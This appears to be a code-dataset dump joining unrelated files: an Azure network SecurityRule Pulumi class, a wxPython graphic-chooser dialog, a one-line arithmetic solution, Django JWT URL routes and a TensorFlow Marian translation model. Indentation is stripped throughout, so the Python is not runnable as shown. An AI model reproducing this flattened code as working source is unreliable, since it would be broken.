:param pulumi.Input[str] source_address_prefix: The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: The CIDR or source IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] source_application_security_groups: The application security group specified as source.
:param pulumi.Input[str] source_port_range: The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: The source port ranges.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if access is None:
raise TypeError("Missing required property 'access'")
__props__['access'] = access
__props__['description'] = description
__props__['destination_address_prefix'] = destination_address_prefix
__props__['destination_address_prefixes'] = destination_address_prefixes
__props__['destination_application_security_groups'] = destination_application_security_groups
__props__['destination_port_range'] = destination_port_range
__props__['destination_port_ranges'] = destination_port_ranges
if direction is None:
raise TypeError("Missing required property 'direction'")
__props__['direction'] = direction
__props__['etag'] = etag
__props__['id'] = id
__props__['name'] = name
if network_security_group_name is None:
raise TypeError("Missing required property 'network_security_group_name'")
__props__['network_security_group_name'] = network_security_group_name
__props__['priority'] = priority
if protocol is None:
raise TypeError("Missing required property 'protocol'")
__props__['protocol'] = protocol
__props__['provisioning_state'] = provisioning_state
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if security_rule_name is None:
raise TypeError("Missing required property 'security_rule_name'")
__props__['security_rule_name'] = security_rule_name
__props__['source_address_prefix'] = source_address_prefix
__props__['source_address_prefixes'] = source_address_prefixes
__props__['source_application_security_groups'] = source_application_security_groups
__props__['source_port_range'] = source_port_range
__props__['source_port_ranges'] = source_port_ranges
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150501preview:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150615:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160330:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20161201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200501:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200601:SecurityRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SecurityRule, __self__).__init__(
'azure-nextgen:network/v20180201:SecurityRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SecurityRule':
"""
Get an existing SecurityRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return SecurityRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def access(self) -> pulumi.Output[str]:
"""
The network traffic is allowed or denied. Possible values are: 'Allow' and 'Deny'.
"""
return pulumi.get(self, "access")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@property
@pulumi.getter(name="destinationAddressPrefixes")
def destination_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination address prefixes. CIDR or destination IP ranges.
"""
return pulumi.get(self, "destination_address_prefixes")
@property
@pulumi.getter(name="destinationApplicationSecurityGroups")
def destination_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as destination.
"""
return pulumi.get(self, "destination_application_security_groups")
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@property
@pulumi.getter
def direction(self) -> pulumi.Output[str]:
"""
The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are: 'Inbound' and 'Outbound'.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[Optional[int]]:
"""
The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Network protocol this rule applies to. Possible values are 'Tcp', 'Udp', and '*'.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[Optional[str]]:
"""
The provisioning state of the public IP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@property
@pulumi.getter(name="sourceAddressPrefixes")
def source_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The CIDR or source IP ranges.
"""
return pulumi.get(self, "source_address_prefixes")
@property
@pulumi.getter(name="sourceApplicationSecurityGroups")
def source_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as source.
"""
return pulumi.get(self, "source_application_security_groups")
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The source port ranges.
"""
return pulumi.get(self, "source_port_ranges")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
86106338bded9ea79b22a0ead788c9f19d612858 | d227fb26e33128afe868bef60e3042f7c6576643 | /editor/Welder/src/Core/Database/Dialogs/ChooseGraphic_Dialog.py | fe49fe21d0ebcf6b5fedbd48ed36524feb53e61d | [] | no_license | boisei0/arcreator | 1e57b9cc61d5b38bfd0d62237592cfd9f371eca9 | 555739cafdeeed19d3c25c4948416a6ecb7697d5 | refs/heads/master | 2020-12-02T05:02:36.242572 | 2014-08-05T19:25:41 | 2014-08-05T19:25:41 | 22,642,617 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,223 | py | import os
import wx
import PIL
from Boot import WelderImport
Kernel = WelderImport('Kernel')
Core = WelderImport('Core')
Templates = Core.Database.Welder_Templates
RTPFunctions = Core.Cache.RTPFunctions
PILCache = Core.Cache.PILCache
class ChooseGraphic_Dialog( Templates.ChooseGraphic_Dialog ):
def __init__( self, parent, folder, current, hue ):
Templates.ChooseGraphic_Dialog.__init__( self, parent )
self.glCanvasGraphic.canvas.Bind(wx.EVT_LEFT_DOWN,
Kernel.Protect(self.glCanvas_LeftMouse))
#self.Centre( wx.BOTH )
self.glCanvasGraphic.SetDrawMode(5)
self.ImageList = ['(None)']
self.ImageList.extend(RTPFunctions.GetFileList(os.path.join('Graphics', folder)))
self.ImageIndex = 0
if folder == 'Characters': self.cache = PILCache.Character
elif folder == 'Battlers': self.cache = PILCache.Battler
# TODO: Implement the rest...
if current in self.ImageList:
self.ImageIndex = self.ImageList.index(current)
self.listBoxGraphics.AppendItems(self.ImageList)
self.listBoxGraphics.SetSelection(self.ImageIndex)
self.sliderHue.SetValue(hue)
self.RefreshCanvas()
def RefreshCanvas( self ):
if self.ImageIndex == 0:
image = PIL.Image.new('RGBA', (32, 32))
else:
filename = self.ImageList[self.ImageIndex]
hue = self.sliderHue.GetValue()
image = self.cache(filename, hue)
self.glCanvasGraphic.ChangeImage(image)
del (image)
def glCanvas_LeftMouse( self, event ):
print 'LEFT DOWN'
def listBoxGraphics_SelectionChanged( self, event ):
"""Changes the image index and refreshes the canvas"""
self.ImageIndex = event.GetSelection()
self.RefreshCanvas()
def sliderHue_Scrolled( self, event ):
"""Refreshes the canvas and redraws with the selected hue rotation"""
self.RefreshCanvas()
PILCache.CacheLimit()
def GetSelection( self ):
"""Returns the filename and hue that was selected by the user"""
if self.ImageIndex == 0:
return 0, 0
return self.ImageList[self.ImageIndex], self.sliderHue.GetValue()
def buttonOK_Clicked( self, event ):
"""End the dialog and return wx.ID_OK"""
self.EndModal(wx.ID_OK)
def buttonCancel_Clicked( self, event ):
"""End the dialog and return wx.ID_CANCEL"""
self.EndModal(wx.ID_CANCEL)
| [
"[email protected]"
] | |
d9eae03071430ffe4305fbd6afc9dc79c2905f78 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03795/s062323227.py | 74243f5eea190a8c47dde198e5a4b21d6edf84c9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | N = int(input())
print(int(800*N-200*(N-N%15)/15)) | [
"[email protected]"
] | |
c3d2c4d91f89382b08790e31e8951c7bb047b615 | c369443df5ff98eccc0eee7f63bb8947f2943605 | /api_shop/urls.py | faef15fce178629654a49b9494cf03b6b004d406 | [] | no_license | erllan/shop-test | d2934f484b25d141a60caa5aca31a61eec48f055 | 1f77de177192ce6a1f8c5ccf1d7ca93ec026acf5 | refs/heads/master | 2023-03-06T01:04:38.785383 | 2021-02-27T18:02:07 | 2021-02-27T18:02:07 | 341,929,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | from django.urls import path
from rest_framework_simplejwt import views as jwt_views
from . import views
urlpatterns = [
path('token/', jwt_views.TokenObtainPairView.as_view(), name='api.get_token'),
path('token/refresh/', jwt_views.TokenRefreshView.as_view(), name='api.token_refresh'),
path('user/change/', views.UserChange.as_view(), name='api-change'),
path('user/create/', views.UserCreate.as_view(), name='api-create')
]
| [
"[email protected]"
] | |
f611ff278e26d20dff934778c3c730b2b4e310bf | e8a48749014f372633de65d79bfa26a3ad743d89 | /src/transformers/models/marian/modeling_tf_marian.py | d356b4f8424008f518c2100b56668730cd548012 | [
"Apache-2.0"
] | permissive | pvcastro/pytorch-pretrained-BERT | 183b7291972c8d8c66c995647df66c1fe439a763 | 49cd736a288a315d741e5c337790effa4c9fa689 | refs/heads/master | 2022-08-19T08:55:16.332585 | 2022-06-30T16:11:08 | 2022-06-30T16:11:08 | 168,367,637 | 1 | 0 | Apache-2.0 | 2019-01-30T15:39:42 | 2019-01-30T15:39:41 | null | UTF-8 | Python | false | false | 67,868 | py | # coding=utf-8
# Copyright 2021 The Marian Team Authors and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TF 2.0 Marian model."""
import random
from typing import Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFBaseModelOutputWithPastAndCrossAttentions,
TFSeq2SeqLMOutput,
TFSeq2SeqModelOutput,
)
# Public API
from ...modeling_tf_utils import (
DUMMY_INPUTS,
TFCausalLanguageModelingLoss,
TFPreTrainedModel,
TFSharedEmbeddings,
TFWrappedEmbeddings,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import (
add_code_sample_docstrings,
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_marian import MarianConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "Helsinki-NLP/opus-mt-en-de"
_CONFIG_FOR_DOC = "MarianConfig"
_TOKENIZER_FOR_DOC = "MarianTokenizer"
LARGE_NEGATIVE = -1e8
# Copied from transformers.models.bart.modeling_tf_bart.shift_tokens_right
def shift_tokens_right(input_ids: tf.Tensor, pad_token_id: int, decoder_start_token_id: int):
pad_token_id = tf.cast(pad_token_id, input_ids.dtype)
decoder_start_token_id = tf.cast(decoder_start_token_id, input_ids.dtype)
start_tokens = tf.fill((shape_list(input_ids)[0], 1), decoder_start_token_id)
shifted_input_ids = tf.concat([start_tokens, input_ids[:, :-1]], -1)
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids = tf.where(
shifted_input_ids == -100, tf.fill(shape_list(shifted_input_ids), pad_token_id), shifted_input_ids
)
if tf.executing_eagerly():
# "Verify that `labels` has only positive values and -100"
assert_gte0 = tf.debugging.assert_greater_equal(shifted_input_ids, tf.constant(0, dtype=input_ids.dtype))
# Make sure the assertion op is called by wrapping the result in an identity no-op
with tf.control_dependencies([assert_gte0]):
shifted_input_ids = tf.identity(shifted_input_ids)
return shifted_input_ids
# Copied from transformers.models.bart.modeling_tf_bart._make_causal_mask
def _make_causal_mask(input_ids_shape: tf.TensorShape, past_key_values_length: int = 0):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz = input_ids_shape[0]
tgt_len = input_ids_shape[1]
mask = tf.ones((tgt_len, tgt_len)) * LARGE_NEGATIVE
mask_cond = tf.range(shape_list(mask)[-1])
mask = tf.where(mask_cond < tf.reshape(mask_cond + 1, (shape_list(mask)[-1], 1)), 0.0, mask)
if past_key_values_length > 0:
mask = tf.concat([tf.zeros((tgt_len, past_key_values_length)), mask], axis=-1)
return tf.tile(mask[None, None, :, :], (bsz, 1, 1, 1))
# Copied from transformers.models.bart.modeling_tf_bart._expand_mask
def _expand_mask(mask: tf.Tensor, tgt_len: Optional[int] = None):
"""
Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.
"""
src_len = shape_list(mask)[1]
tgt_len = tgt_len if tgt_len is not None else src_len
one_cst = tf.constant(1.0)
mask = tf.cast(mask, dtype=one_cst.dtype)
expanded_mask = tf.tile(mask[:, None, None, :], (1, 1, tgt_len, 1))
return (one_cst - expanded_mask) * LARGE_NEGATIVE
class TFMarianSinusoidalPositionalEmbedding(tf.keras.layers.Layer):
"""This module produces sinusoidal positional embeddings of any length."""
def __init__(self, num_positions: int, embedding_dim: int, **kwargs):
super().__init__(**kwargs)
if embedding_dim % 2 != 0:
raise NotImplementedError(f"odd embedding_dim {embedding_dim} not supported")
self.embedding_dim = embedding_dim
self.num_positions = num_positions
def build(self, input_shape: tf.TensorShape):
"""
Build shared token embedding layer Shared weights logic adapted from
https://github.com/tensorflow/models/blob/a009f4fb9d2fc4949e32192a944688925ef78659/official/transformer/v2/embedding_layer.py#L24
"""
weight = self._init_weight(self.num_positions, self.embedding_dim)
self.weight = self.add_weight(
name="embeddings",
shape=[self.num_positions, self.embedding_dim],
)
weight = tf.cast(weight, dtype=self.weight.dtype)
self.weight.assign(weight)
super().build(input_shape)
@staticmethod
def _init_weight(n_pos: int, dim: int):
"""
Identical to the XLM create_sinusoidal_embeddings except features are not interleaved. The cos features are in
the 2nd half of the vector. [dim // 2:]
"""
position_enc = np.array(
[[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)] for pos in range(n_pos)]
)
table = np.zeros_like(position_enc)
# index 0 is all zero
table[:, 0 : dim // 2] = np.sin(position_enc[:, 0::2])
table[:, dim // 2 :] = np.cos(position_enc[:, 1::2])
# convert to tensor
table = tf.convert_to_tensor(table)
tf.stop_gradient(table)
return table
def call(
self, input_shape: tf.TensorShape, past_key_values_length: int = 0, position_ids: Optional[tf.Tensor] = None
):
"""Input is expected to be of size [bsz x seqlen]."""
if position_ids is None:
seq_len = input_shape[1]
position_ids = tf.range(past_key_values_length, seq_len + past_key_values_length, delta=1, name="range")
return tf.gather(self.weight, position_ids)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartAttention with Bart->Marian
class TFMarianAttention(tf.keras.layers.Layer):
"""Multi-headed attention from "Attention Is All You Need"""
def __init__(
self,
embed_dim: int,
num_heads: int,
dropout: float = 0.0,
is_decoder: bool = False,
bias: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = tf.keras.layers.Dropout(dropout)
self.head_dim = embed_dim // num_heads
if (self.head_dim * num_heads) != self.embed_dim:
raise ValueError(
f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}"
f" and `num_heads`: {num_heads})."
)
self.scaling = self.head_dim**-0.5
self.is_decoder = is_decoder
self.k_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="k_proj")
self.q_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="q_proj")
self.v_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="v_proj")
self.out_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="out_proj")
def _shape(self, tensor: tf.Tensor, seq_len: int, bsz: int):
return tf.transpose(tf.reshape(tensor, (bsz, seq_len, self.num_heads, self.head_dim)), (0, 2, 1, 3))
def call(
self,
hidden_states: tf.Tensor,
key_value_states: Optional[tf.Tensor] = None,
past_key_value: Optional[Tuple[Tuple[tf.Tensor]]] = None,
attention_mask: Optional[tf.Tensor] = None,
layer_head_mask: Optional[tf.Tensor] = None,
training: Optional[bool] = False,
) -> Tuple[tf.Tensor, Optional[tf.Tensor]]:
"""Input shape: Batch x Time x Channel"""
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
bsz, tgt_len, embed_dim = shape_list(hidden_states)
# get query proj
query_states = self.q_proj(hidden_states) * self.scaling
# get key, value proj
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_states = past_key_value[0]
value_states = past_key_value[1]
elif is_cross_attention:
# cross_attentions
key_states = self._shape(self.k_proj(key_value_states), -1, bsz)
value_states = self._shape(self.v_proj(key_value_states), -1, bsz)
elif past_key_value is not None:
# reuse k, v, self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
key_states = tf.concat([past_key_value[0], key_states], axis=2)
value_states = tf.concat([past_key_value[1], value_states], axis=2)
else:
# self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
if self.is_decoder:
# if cross_attention save Tuple(tf.Tensor, tf.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(tf.Tensor, tf.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_states, value_states)
proj_shape = (bsz * self.num_heads, -1, self.head_dim)
query_states = tf.reshape(self._shape(query_states, tgt_len, bsz), proj_shape)
key_states = tf.reshape(key_states, proj_shape)
value_states = tf.reshape(value_states, proj_shape)
src_len = shape_list(key_states)[1]
attn_weights = tf.matmul(query_states, key_states, transpose_b=True)
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attn_weights),
[bsz * self.num_heads, tgt_len, src_len],
message=(
f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is"
f" {shape_list(attn_weights)}"
),
)
if attention_mask is not None:
            # The tf.debugging asserts are not compliant with XLA, so they
            # have to be disabled in modes other than eager execution.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attention_mask),
[bsz, 1, tgt_len, src_len],
message=(
f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is"
f" {shape_list(attention_mask)}"
),
)
attention_mask = tf.cast(attention_mask, dtype=attn_weights.dtype)
attn_weights = tf.reshape(attn_weights, (bsz, self.num_heads, tgt_len, src_len)) + attention_mask
attn_weights = tf.reshape(attn_weights, (bsz * self.num_heads, tgt_len, src_len))
attn_weights = stable_softmax(attn_weights, axis=-1)
if layer_head_mask is not None:
            # The tf.debugging asserts are not compliant with XLA, so they
            # have to be disabled in modes other than eager execution.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(layer_head_mask),
[self.num_heads],
message=(
f"Head mask for a single layer should be of size {(self.num_heads)}, but is"
f" {shape_list(layer_head_mask)}"
),
)
attn_weights = tf.reshape(layer_head_mask, (1, -1, 1, 1)) * tf.reshape(
attn_weights, (bsz, self.num_heads, tgt_len, src_len)
)
attn_weights = tf.reshape(attn_weights, (bsz * self.num_heads, tgt_len, src_len))
attn_probs = self.dropout(attn_weights, training=training)
attn_output = tf.matmul(attn_probs, value_states)
        # The tf.debugging asserts are not compliant with XLA, so they
        # have to be disabled in modes other than eager execution.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attn_output),
[bsz * self.num_heads, tgt_len, self.head_dim],
message=(
                    f"`attn_output` should be of size {(bsz * self.num_heads, tgt_len, self.head_dim)}, but is"
f" {shape_list(attn_output)}"
),
)
attn_output = tf.transpose(
tf.reshape(attn_output, (bsz, self.num_heads, tgt_len, self.head_dim)), (0, 2, 1, 3)
)
attn_output = tf.reshape(attn_output, (bsz, tgt_len, embed_dim))
attn_output = self.out_proj(attn_output)
attn_weights: tf.Tensor = tf.reshape(attn_weights, (bsz, self.num_heads, tgt_len, src_len))
return attn_output, attn_weights, past_key_value
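# Illustrative sketch (added for clarity, not part of the original file): shape flow through
# TFMarianAttention.call for an assumed embed_dim=512, num_heads=8, bsz=2, tgt_len=7 in self-attention:
#   q_proj(hidden_states)                     -> (2, 7, 512)
#   _shape(..., 7, 2)                         -> (2, 8, 7, 64)
#   reshape to proj_shape                     -> (16, 7, 64)
#   attn_weights = Q @ K^T                    -> (16, 7, 7)
#   attn_output -> reshape/transpose/out_proj -> (2, 7, 512)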
# Copied from transformers.models.bart.modeling_tf_bart.TFBartEncoderLayer with Bart->Marian
class TFMarianEncoderLayer(tf.keras.layers.Layer):
def __init__(self, config: MarianConfig, **kwargs):
super().__init__(**kwargs)
self.embed_dim = config.d_model
self.self_attn = TFMarianAttention(
self.embed_dim, config.encoder_attention_heads, dropout=config.attention_dropout, name="self_attn"
)
self.self_attn_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="self_attn_layer_norm")
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.activation_fn = get_tf_activation(config.activation_function)
self.activation_dropout = tf.keras.layers.Dropout(config.activation_dropout)
self.fc1 = tf.keras.layers.Dense(config.encoder_ffn_dim, name="fc1")
self.fc2 = tf.keras.layers.Dense(self.embed_dim, name="fc2")
self.final_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="final_layer_norm")
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]],
layer_head_mask: Optional[tf.Tensor],
training: Optional[bool] = False,
) -> tf.Tensor:
"""
Args:
            hidden_states (`tf.Tensor`): input to the layer of shape `(batch, seq_len, embed_dim)`
attention_mask (`tf.Tensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (`tf.Tensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`
"""
residual = hidden_states
hidden_states, self_attn_weights, _ = self.self_attn(
hidden_states=hidden_states, attention_mask=attention_mask, layer_head_mask=layer_head_mask
)
        # The tf.debugging asserts are not compliant with XLA, so they
        # have to be disabled in modes other than eager execution.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(hidden_states),
shape_list(residual),
message=f"Self attn modified the shape of query {shape_list(residual)} to {shape_list(hidden_states)}",
)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = self.activation_dropout(hidden_states, training=training)
hidden_states = self.fc2(hidden_states)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
return hidden_states, self_attn_weights
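# Note added for clarity (not from the original source): the encoder layer above follows a
# post-layer-norm residual pattern, i.e. roughly
#   x = LayerNorm(x + Dropout(SelfAttention(x)))
#   x = LayerNorm(x + Dropout(FC2(ActivationDropout(Activation(FC1(x))))))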
# Copied from transformers.models.bart.modeling_tf_bart.TFBartDecoderLayer with Bart->Marian
class TFMarianDecoderLayer(tf.keras.layers.Layer):
def __init__(self, config: MarianConfig, **kwargs):
super().__init__(**kwargs)
self.embed_dim = config.d_model
self.self_attn = TFMarianAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
dropout=config.attention_dropout,
name="self_attn",
is_decoder=True,
)
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.activation_fn = get_tf_activation(config.activation_function)
self.activation_dropout = tf.keras.layers.Dropout(config.activation_dropout)
self.self_attn_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="self_attn_layer_norm")
self.encoder_attn = TFMarianAttention(
self.embed_dim,
config.decoder_attention_heads,
dropout=config.attention_dropout,
name="encoder_attn",
is_decoder=True,
)
self.encoder_attn_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="encoder_attn_layer_norm")
self.fc1 = tf.keras.layers.Dense(config.decoder_ffn_dim, name="fc1")
self.fc2 = tf.keras.layers.Dense(self.embed_dim, name="fc2")
self.final_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="final_layer_norm")
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
